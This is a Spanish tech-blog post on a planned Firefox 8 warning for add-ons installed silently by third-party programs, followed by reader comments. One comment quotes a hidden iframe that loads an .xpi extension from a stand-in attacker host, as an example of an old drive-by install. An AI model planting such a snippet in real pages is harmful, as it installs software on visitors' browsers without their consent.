Si hay un problema molesto que viene arrastrando Firefox desde hace tiempo es el de la instalación de extensiones de terceros sin autorización. Seguro que os ha pasado alguna vez: al revisar las extensiones que tenéis, os encontráis con una o dos que sabéis que no las habéis puesto vosotros, sino algún programa que lo ha hecho sin avisar.
Sin embargo, esto está en vías de resolverse. Según se puede ver en el wiki de Mozilla, está planeada una solución que entraría en acción desde Firefox 8 (del cual hizo una revisión mi compañero F. Manuel en la versión nightly x64). El objetivo sería avisar cuando una extensión trata de instalarse sin que nos demos cuenta de ello y darle la oportunidad al usuario de impedirlo.
La imagen que encabeza esta entrada es tan sólo un mockup de como podría verse esta función en la práctica. Todavía está en desarrollo, pero dado que en el wiki su salud está calificada como OK, si no se tuerce nada podremos verla en marcha, como he dicho, desde la versión 8.
Aunque no se especifica, asumo que como sólo dicen “add-ons”, se refieren únicamente a las extensiones. Esperemos que también tomen medidas respecto a los plugins, con los que hay el mismo problema. Sin embargo, al echar un vistazo por el wiki, no he podido encontrar nada al respecto.
Vía | Ghacks
Enlace | Wiki de Mozilla
Imagen | Boriss y Alex Faaborg
Comentarios
como que... se tendrian que haber avivado antes
interesante
Nunca llegaré a entender por qué para algunas personas todas las nuevas características llegan siempre demasiado tarde.
Hombre, si a ti te parece normal que se permita instalar cosas sin nuestro consentimiento...
Pero eso NO es culpa de Firefoc, si no de otros programas. Y alguno incluso te avisa de ello.
Entiendo, entonces no es problema de Microsoft los agujeros de seguridad de Windows, si no exclusivamente de la gente que los usa ¬¬, entiendo, pues avisales que se ahorrarán millonadas.
-- editado por última vez a las 09:25
Era un problema de seguridad, pues te instalaba extensiones que tu no querías, siempre es bueno para el usuario que te avisen de cosas por el estilo. Pero cuando instalas algo en el ordenador, tienes que pasar a modo administrador. Un poco de cuidado en esa parte, seguro que te ahorra un montón de problemas. No siempre, van a ir detrás de uno para enmendarle la plana.
Claro que el tipo entre la silla y el PC no sé que hace pero siempre escabulle su responsabilidad. Las extensiones, como los troyanos, no se instalan solos, vienen de regalo con muchos programas bajados de sitios que tienen de todo menos confianza. Por no hablar de los de siguiente, siguiente sin mirar y luego llorar.
Si el programa es importante dedicarle un tiempo a la instalación, es mejor que dedicarselo después cuando realmente te va a dar dolores de cabeza.
-- editado por última vez a las 10:58
Firefox es multiplataforma, estas extensiones se pueden colar for agujeros en windows, mac o linux. O te dijeron en la tienda que mac no tenia virus y era perfecto?
Llega tarde porque hace tiempo la gente ha estado alertando y quejándose de eso, porque era una vulnerabilidad previsible y sobretodo porque desde que nacieron lo hicieron sobre la burla constante a la vulnerabilidad e inseguridad de IE donde cualquier agente externo le instalaba cualquier cosa.
Por lo que es un FAIL más grande haberlo diseñado con la misma falla descubierta de la que tanta mofa se hizo.
+20 una respuesta seria y razonada.
No hay relación con mi comentario. Yo me refiero a la persona que comenta arriba sobre que se tenian que avivar antes, continuamente encuentro comentarios de este tipo, principalmente en materia de navegadores.
Parece que Firefox va espabilando. A ver si también le dan un empujón al navegador para móviles, que ahí tienen más trabajo...
y la version 6 que novedad tiene?? hace rato estoy leyendo acerca de nuevas funciones en firefox 8 y 9 pero, y la que sigue??? (si ya salio la 6 y 7 diganme por que hasta lo que sé no han sido liberadas....)
Prepárate porque Mozilla le entro al juego de sacar muchas versiones cada 2 meses, aunque no traerán ninguna novedad destacable, digo yo ¿para que anuncian esto? yo soy de los que piensa,si dices que la versión que saldrá en 5 meses tendrá eso ¿porque no se lo pones a la próxima versión a salir? FF6
Hablo desde el desconocimiento, pero, ¿esto no está ya entre la opciones de FF5?
En Opciones -> Seguridad -> Advertir cuando algún sitio intente instalar complementos.
¿No van por ahí los tiros?
Saludos!!
-- editado por última vez a las 13:40
Quizás sea porque esta característica resulta insuficiente... porque ¿nunca has instalado Java y cuando abres Firefox vas a complementos y ya tienes otro plugin nuevo y no saltó ninguna advertencia del navegador? ¿o instalado un programa y luego ya tienes instalada un nuevo botón o barra que no sabes de donde salió?
A mí esta función me parecería innecesaria si todos los programas que intentan instalar una extensión te avisaran de sus intenciones y te ofrecieran la opción de omitirla, pero como hay programadores que no se toman esa molestia (o de plano lo hacen intencionalmente) no queda más remedio que esperar que Firefox (y otros navegadores) las bloqueen hasta que el usuario voluntariamente autorice los cambios.
La única pega que yo le noto es que tales advertencias, cuando son muy frecuentes terminan por ser ignoradas por el usuario, en otros casos el usuario no dispone de los conocimientos necesarios para decidir y puede terminar bloqueando una extensión que necesita o permitiendo otra que debería bloquear por innecesaria o peligrosa para su seguridad o privacidad.
Sí, con los plugins sí que me ha pasado el encontrarme alguno instalado que no me ha pedido permiso (de hecho, no sé de ningún plugin que pida permiso para instalarse o activarse. Uno mismo los instala bien directamente, tipo Java o Flash, o bien indirectamente, como los de Picasa o Earth), pero el artículo especifica que nada indica que la característica que implementarán en Firefox afectará a los plugins, con lo cual, seguimos sin beneficio aparente.
Si nos ceñimos a los complementos, desde que vengo usando Firefox (empecé con Bon Echo sobre 2006), no recuerdo encontrarme con ninguno instalado al que no haya que tenido que dar permiso previo.
Sigo pensando que me he perdido algo de la noticia.
Un saludo.
Si no me equivoco eso fue para evitar que en algún sitio que entres hicieran por ejemplo algo como:
<iframe src="http://soyhacker.com/extension.xpi" style="display: none"></iframe>
Que si no recuerdo mal ocurría en Firefox 1 y algo.
-- editado por última vez a las 19:59
Disculpa, creo que no he sido suficientemente claro. He citado el caso de los plugins como un ejemplo de instalación silenciosa, como una analogía del caso que aquí se comenta en ciertos casos.
Hay diversas formas de instalar extensiones. 1. Por el repositorio de Mozilla, 2. Otras páginas web. 3. Como parte de la instalación de un programa de terceros.
La característica de seguridad que tú nombras, que trae Firefox desde siempre, se ocupa exclusivamente de protegernos de instalaciones no autorizadas de sitios web, es decir, la opción 2 para instalar extensiones.
Pero el artículo se refiere al a forma 3, cuando nuestra intención primaria no es instalar la extensión sino un programa de terceros y la extensión viene como un bono o adicional (y que no siempre es bienvenido).
Y cito lo que puede leerse en la imagen de cabecera del artículo: "Another program on your computer..."
No entiendo el post. A mí nunca me ha pasado eso, y como dice #11 esa opción ya viene, siempre me ha avisado si algún sitio web intenta instalarme algo. Como no sea que te avise que el SuperMegaDownloaderPlusGold que te has instalado intenta colarte una extensión por la jeta =/
Se refiere, por ejemplo, a muchas aplicaciones legales como las que se instalan en Windows que te meten sus extensiones sin consultarte u otras que del siguiente-siguiente se instalan sin tu consentimiento o dándoselo sin darte cuenta.
Google x ejemplo que te mete plugins al firefox cosa mala
Escribir un comentario
Para hacer un comentario es necesario que te identifiques: ENTRA o conéctate con FacebookConnect